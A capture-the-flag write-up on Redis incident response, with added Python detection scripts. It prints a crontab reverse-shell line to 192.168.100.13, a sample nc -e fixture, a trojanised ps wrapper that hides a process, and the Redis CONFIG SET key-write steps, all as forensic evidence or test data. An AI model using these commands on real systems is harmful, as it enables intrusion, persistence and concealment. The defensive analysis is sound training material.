Chapter 2: Log Analysis - Redis Incident Response - 玄机靶场 (Xuanji cyber range)


Redis incident response - range notes

Challenge summary

SSH from the local PC to the server and work out which IP the attacker used for the successful attack; submit that IP as the FLAG;

SSH from the local PC to the server and find the first malicious file the attacker uploaded; submit the FLAG contained in that file;

SSH from the local PC to the server and work out the IP the attacker's reverse shell connects to; submit that IP as the FLAG;

SSH from the local PC to the server, trace the attacker's username, and find the key string inside the tool the attacker used (flag{attacker-username-key-string}; the key string has the form xxx-xxx-xxx). Submit the username and key string as the FLAG;

SSH from the local PC to the server and analyse the command the attacker tampered with; submit the key string inside the tampered command as the FLAG;

SSH from the local PC to the server and work out which IP the attacker used for the successful attack

Analysing /var/log/redis.log shows that the instance was pointed at a rogue master on 192.168.100.20:8888 (MASTER <-> REPLICA sync), the TCP connect succeeded, and right afterwards the malicious module "exp.so" was loaded (Module 'system' loaded from ./exp.so). This is the rogue-master replication technique: the attacker's fake master delivers the .so as the "RDB" payload and then has it loaded with MODULE LOAD.

419:S 31 Jul 2023 05:34:35.197 # Failed trying to load the MASTER synchronization DB from disk
419:S 31 Jul 2023 05:34:35.791 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:35.791 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:35.792 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so
419:M 31 Jul 2023 05:34:37.210 # Setting secondary replication ID to 7a73a1a4297a16c50d8465b0cc432444f0e5df71, valid up to offset: 1. New replication ID is 46e68f9593cd148bffe464f0b04bee19ac447c39

The last line is also telling: the role flag changes from S (replica) to M (master) and a new replication ID is set, which is what Redis logs when REPLICAOF NO ONE turns the instance back into a master, a typical clean-up step after the module is in. So the flag is flag{192.168.100.20}.
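As an added example (not part of the original writeup), the following Python script automates the reading above: it walks a Redis log in order, attributes every SYNC outcome and module load to the most recently configured master, and separates masters that were merely attempted (connection refused) from the one that completed a connect and then loaded a module. The sample log is constructed from the excerpts on this page.

```python
import re
from collections import defaultdict

# Constructed sample modelled on the /var/log/redis.log excerpts in this writeup.
SAMPLE_LOG = """\
419:S 31 Jul 2023 05:33:51.694 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:51.694 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:51.695 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:52.696 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:52.696 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:52.697 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:34:35.791 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:35.791 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:35.792 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so
419:M 31 Jul 2023 05:34:37.210 # Setting secondary replication ID to 7a73a1a4297a16c50d8465b0cc432444f0e5df71, valid up to offset: 1. New replication ID is 46e68f9593cd148bffe464f0b04bee19ac447c39
"""

MASTER_RE = re.compile(r"Connecting to MASTER (\d{1,3}(?:\.\d{1,3}){3}):(\d+)")
REFUSED_RE = re.compile(r"Error condition on socket for SYNC")
CONNECTED_RE = re.compile(r"Non blocking connect for SYNC fired the event")
MODULE_RE = re.compile(r"Module '([^']+)' loaded from (\S+)")


def triage_redis_log(text):
    """Walk the log in order; every SYNC outcome and module load is attributed
    to the master most recently set with REPLICAOF/SLAVEOF."""
    stats = defaultdict(lambda: {"attempts": 0, "refused": 0, "connected": 0, "modules": []})
    current = None
    for line in text.splitlines():
        m = MASTER_RE.search(line)
        if m:
            current = f"{m.group(1)}:{m.group(2)}"
            stats[current]["attempts"] += 1
            continue
        if current is None:
            continue  # nothing replication-related has happened yet
        if REFUSED_RE.search(line):
            stats[current]["refused"] += 1
        elif CONNECTED_RE.search(line):
            stats[current]["connected"] += 1
        else:
            mod = MODULE_RE.search(line)
            if mod:
                stats[current]["modules"].append((mod.group(1), mod.group(2)))
    return dict(stats)


def successful_masters(stats):
    """Masters that completed a TCP connect and were followed by a module load:
    the signature of a successful rogue-master attack."""
    return sorted(ep.split(":")[0] for ep, s in stats.items() if s["connected"] and s["modules"])


def attempted_masters(stats):
    """Every master the instance was ever told to replicate from."""
    return sorted(ep.split(":")[0] for ep in stats)


if __name__ == "__main__":
    st = triage_redis_log(SAMPLE_LOG)
    print("attempted:", attempted_masters(st))
    print("successful:", successful_masters(st))
```

On a real host, replace SAMPLE_LOG with the contents of /var/log/redis.log; the attempted-but-refused master (192.168.100.13 here) is just as relevant to the investigation as the successful one, since it is an attacker-controlled address either way.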

SSH from the local PC to the server and find the first malicious file the attacker uploaded

From the reasoning in the first question we know the first malicious file the attacker uploaded is "exp.so".

Running strings /exp.so | grep "flag" on it gives the flag:

root@ip-10-0-10-2:~# strings  /exp.so | grep "flag"
flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b}
_flags2
_flags

SSH from the local PC to the server and work out the IP the attacker's reverse shell connects to

In /var/log/redis.log there is a run of odd connection attempts:

Jul 2023 05:33:50.693 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:51.694 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:51.694 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:51.695 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:52.696 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:52.696 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:52.697 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:53.698 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:53.698 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:53.699 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:54.700 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:54.700 * MASTER <-> REPLICA sync started

The instance is repeatedly trying to sync from a master at 192.168.100.13:8888 and being refused, i.e. the attacker had already issued REPLICAOF/SLAVEOF pointing at their own host before their rogue master was listening on port 8888. 192.168.100.13 is therefore inferred to be the attacker's IP.

The crontab (crontab -l) also contains a reverse shell, and its destination is the same IP, 192.168.100.13:

root@ip-10-0-10-2:~# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
*/1 * * * * /bin/sh -i >& /dev/tcp/192.168.100.13/7777 0>&1
# m h dom mon dow command
root@ip-10-0-10-2:~#

SSH from the local PC to the server, trace the attacker's username, and find the key string inside the tool the attacker used

Checking the SSH keys reveals a likely username, xj-test-user. Note how the file begins with a Redis RDB header (REDIS0009, redis-ver 5.0.1): authorized_keys was written by Redis itself (CONFIG SET dir /root/.ssh, CONFIG SET dbfilename authorized_keys, SAVE), the classic key-write against an unauthenticated Redis. sshd skips the lines it cannot parse and accepts the ssh-rsa line that follows them.

root@ip-10-0-10-2:~# cat  .ssh/authorized_keys 
REDIS0009� redis-ver5.0.1�
�edis-bits�@�ctime�tO�dused-mem�XU
aof-preamble���xxsshB9

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDDh4OEFvyb4ubM7YPvzG/FfO6jE4PjLdmuCUdGP+aeLeJB5SXYT6zHkU9wlfY/Fo4UuBlhTqBaS6Ih/Wf62KepzrMsTQQYcSG/Xp8lgFzVCCFAk7apzxfRCPNk1pxaGiEF6MPoCmUu1UhC3ta3xyh2c4KZls0hyFN9JZsuD+siT8KVqm856vQ+RaTrZi3ThMa5gbeH+v3ZUcO35ZfMKor/uWXffHT0Yi06dsgIMN3faIiBrd1Lg0B5kOTaDq3fHs8Qs7pvR9C4ZTm2AK/Oct8ULdsnfS2YWtrYyC8rzNip9Wf083ZY1B4bj1UoxD+QwgThh5VP3xgRd9KDSzEYIBabstGh8GU5zDxr0zIuhQM35I0aALvojXl4QaaEnZwpqU3ZkojPG2aNC0QdiBK7eKwA38Gk+V8DEWc/TTkO+wm3aXYdll5sPmoWTAonaln1nmCiTDn4jKb73DxYHfSgNIDpJ6fS5kbWL5UJnElWCrxzaXKHUlqXJj3x81Oz6baFNv8= xj-test-user
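Both persistence artifacts found so far (the reverse-shell cron job above and this Redis-written authorized_keys) can be triaged with the same small script. It is an added example, not part of the original writeup: it parses a user crontab and flags commands containing /dev/tcp or nc reverse-shell patterns, and it checks an authorized_keys file for an RDB header while listing the key lines sshd would still honour. The crontab and the RDB bytes are constructed samples modelled on the output above (the binary header is an approximation, and an extra @reboot nc line is included to exercise the second pattern).

```python
import re

# Constructed samples modelled on the crontab -l and authorized_keys output above.
SAMPLE_CRONTAB = """\
# Edit this file to introduce tasks to be run by cron.
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
*/1 * * * * /bin/sh -i >& /dev/tcp/192.168.100.13/7777 0>&1
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
@reboot /usr/bin/nc -e /bin/sh 10.0.0.5 4444
"""

# Approximation of the RDB header a Redis 5 SAVE writes, followed by a key line
# with a constructed (not real) key body.
SAMPLE_AUTHORIZED_KEYS = (
    b"REDIS0009\xfa\x09redis-ver\x055.0.1\xfa\x0aredis-bits\xc0\x40"
    b"\xfa\x05ctime\xc2tO\xaad\xfa\x08used-mem\xc2XU\x0a\xfa\x0caof-preamble\xc0\x00"
    b"\xfe\x00\xfb\x01\x00\x00\x03xxssh\xc3B9\x0a\x0a"
    b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDDh4OE_CONSTRUCTED_KEY_BODY xj-test-user\n"
)

CRON_FIELDS = 5
REVERSE_SHELL_RE = re.compile(
    r"/dev/(?:tcp|udp)/(\d{1,3}(?:\.\d{1,3}){3})/(\d+)"                      # bash /dev/tcp redirection
    r"|\b(?:nc|ncat|netcat)\b[^;|&]*?\s(\d{1,3}(?:\.\d{1,3}){3})\s+(\d+)"     # nc <ip> <port>
)


def parse_crontab(text):
    """Yield (schedule, command) for each job in a *user* crontab (no user field)."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                     # @reboot, @daily, ...
            parts = line.split(None, 1)
            if len(parts) == 2:
                yield parts[0], parts[1]
            continue
        parts = line.split(None, CRON_FIELDS)
        if len(parts) > CRON_FIELDS:                 # five schedule fields plus a command
            yield " ".join(parts[:CRON_FIELDS]), parts[CRON_FIELDS]


def find_reverse_shells(crontab_text):
    """Return every cron job whose command matches a reverse-shell pattern."""
    findings = []
    for schedule, command in parse_crontab(crontab_text):
        m = REVERSE_SHELL_RE.search(command)
        if m:
            findings.append({
                "schedule": schedule,
                "ip": m.group(1) or m.group(3),
                "port": int(m.group(2) or m.group(4)),
                "command": command,
            })
    return findings


RDB_MAGIC_RE = re.compile(rb"REDIS(\d{4})")
# RDB aux field: "redis-ver", one length byte, then the version string.
RDB_VERSION_RE = re.compile(rb"redis-ver.([0-9][0-9.]*)", re.DOTALL)
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")


def inspect_authorized_keys(data):
    """Detect an authorized_keys that is really a Redis RDB dump (CONFIG SET
    dir/dbfilename + SAVE) and list the key lines sshd would still accept,
    since sshd ignores unparseable lines and honours the valid ones."""
    magic = RDB_MAGIC_RE.search(data)
    ver = RDB_VERSION_RE.search(data)
    keys = []
    for raw in data.split(b"\n"):
        parts = raw.decode("utf-8", errors="replace").strip().split(None, 2)
        if len(parts) >= 2 and parts[0] in KEY_TYPES:   # option-prefixed lines are not handled
            keys.append({"type": parts[0], "comment": parts[2] if len(parts) == 3 else ""})
    return {
        "redis_written": magic is not None,
        "rdb_version": magic.group(1).decode() if magic else None,
        "redis_version": ver.group(1).decode() if ver else None,
        "keys": keys,
    }


if __name__ == "__main__":
    print(find_reverse_shells(SAMPLE_CRONTAB))
    print(inspect_authorized_keys(SAMPLE_AUTHORIZED_KEYS))
```

On a live host, feed it the output of crontab -l for every user (and /etc/cron.d, which uses an extra user field the parser above does not expect) and the bytes of each ~/.ssh/authorized_keys; the key comment is only a hint at the operator's handle, as here, and is trivially forgeable.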

A GitHub search for xj-test-user turns up a repository matching the attack tooling, redis-rogue-getshell.

The project itself contains no flag; after some digging, the commit history does.

In the commit titled "typ" (https://github.com/xj-test-user/redis-rogue-getshell/commit/76b1b74b92f9cc6ef2a62985debdf09dcc056636) one file contains the embedded string wow-you-find-flag, giving flag{xj-test-user-wow-you-find-flag}.

SSH from the local PC to the server and analyse the command the attacker tampered with; submit the key string inside the tampered command as the FLAG

Use ls -alt /bin/ to list the most recently changed commands:

root@ip-10-0-10-2:~# ls -alt /bin/
total 197540
drwxr-xr-x 2 root root 36864 Aug 1 2023 .
-rwxrwxrwx 1 root root 178 Jul 31 2023 ps
-rwxr-xr-x 1 root root 133432 Jul 31 2023 ps_
lrwxrwxrwx 1 root root 25 Jul 31 2023 aclocal -> /etc/alternatives/aclocal
lrwxrwxrwx 1 root root 26 Jul 31 2023 automake -> /etc/alternatives/automake
lrwxrwxrwx 1 root root 21 Jul 31 2023 c99 -> /etc/alternatives/c99

ps stands out: it is world-writable (777), only 178 bytes where a real ps is an ELF of about 130 KB (compare ps_ right beside it), and was modified on Jul 31. Reading it shows a wrapper script that runs the renamed original ps_ and drops any line containing "threadd", hiding the attacker's process; the key string is in the trailing comment line:

root@ip-10-0-10-2:~# cat /bin/ps
#/bin/bash
oldifs="$IFS"
IFS='\$n'
result=$(ps_ $1 $2 $3|grep -v 'threadd' )
for v in $result;
do
echo -e "$v\t";
done
IFS="$oldifs"
#//c195i2923381905517d818e313792d196
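As an added example (not part of the original writeup), this Python audit turns the manual ls -alt check into something repeatable: it classifies every regular file in a binary directory by its first bytes rather than its name, and flags scripts sitting where ELF binaries are expected, world-writable files, and a renamed original kept beside the wrapper (ps_ next to ps). The fixture directory is constructed to mirror the listing above.

```python
import os
import stat
import tempfile

ELF_MAGIC = b"\x7fELF"


def classify(path):
    """'elf', 'script' or 'other', decided from the first bytes, not the name."""
    with open(path, "rb") as f:
        head = f.read(4)
    if head == ELF_MAGIC:
        return "elf"
    if head.startswith(b"#"):
        return "script"
    return "other"


def audit_bin_dir(directory):
    """Flag regular files that look replaced: a script where an ELF binary is
    expected, a world-writable file, or a renamed original left beside it."""
    names = set(os.listdir(directory))
    findings = []
    for name in sorted(names):
        path = os.path.join(directory, name)
        st = os.lstat(path)
        if not stat.S_ISREG(st.st_mode):
            continue            # /etc/alternatives symlinks and the like are normal here
        reasons = []
        kind = classify(path)
        if kind == "script":
            reasons.append("script where an ELF binary is expected")
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
        for sibling in (name + "_", "." + name, name + ".bak", name + ".orig"):
            sibling_path = os.path.join(directory, sibling)
            if sibling in names and os.path.isfile(sibling_path) and classify(sibling_path) == "elf":
                reasons.append("original binary apparently kept as " + sibling)
        if reasons:
            findings.append({"name": name, "kind": kind, "size": st.st_size,
                             "mode": oct(st.st_mode & 0o777), "reasons": reasons})
    return findings


def build_sample_dir():
    """Constructed fixture modelled on the ls -alt /bin/ listing above: a 777 wrapper
    script named ps, a fake ELF kept as ps_, an untouched fake ELF and a symlink."""
    d = tempfile.mkdtemp()
    fake_elf = ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 61
    with open(os.path.join(d, "ps"), "w") as f:
        f.write("#/bin/bash\nresult=$(ps_ \"$@\" | grep -v 'threadd')\necho \"$result\"\n")
    os.chmod(os.path.join(d, "ps"), 0o777)
    for name in ("ps_", "ls"):
        with open(os.path.join(d, name), "wb") as f:
            f.write(fake_elf)
        os.chmod(os.path.join(d, name), 0o755)
    try:
        os.symlink("/etc/alternatives/c99", os.path.join(d, "c99"))
    except OSError:
        pass                    # symlinks unavailable on this filesystem; not needed for the audit
    return d


if __name__ == "__main__":
    for finding in audit_bin_dir(build_sample_dir()):
        print(finding)
```

Run audit_bin_dir("/bin") on the compromised host. Legitimate shell scripts do live in /bin, so treat each hit as a lead and confirm it against the package manager (dpkg -V procps or rpm -Vf /bin/ps), which compares the installed file with the package's recorded hash.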